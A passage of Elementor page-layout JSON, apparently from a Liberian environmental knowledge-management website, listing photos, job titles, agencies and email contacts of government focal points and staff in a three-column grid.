href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a 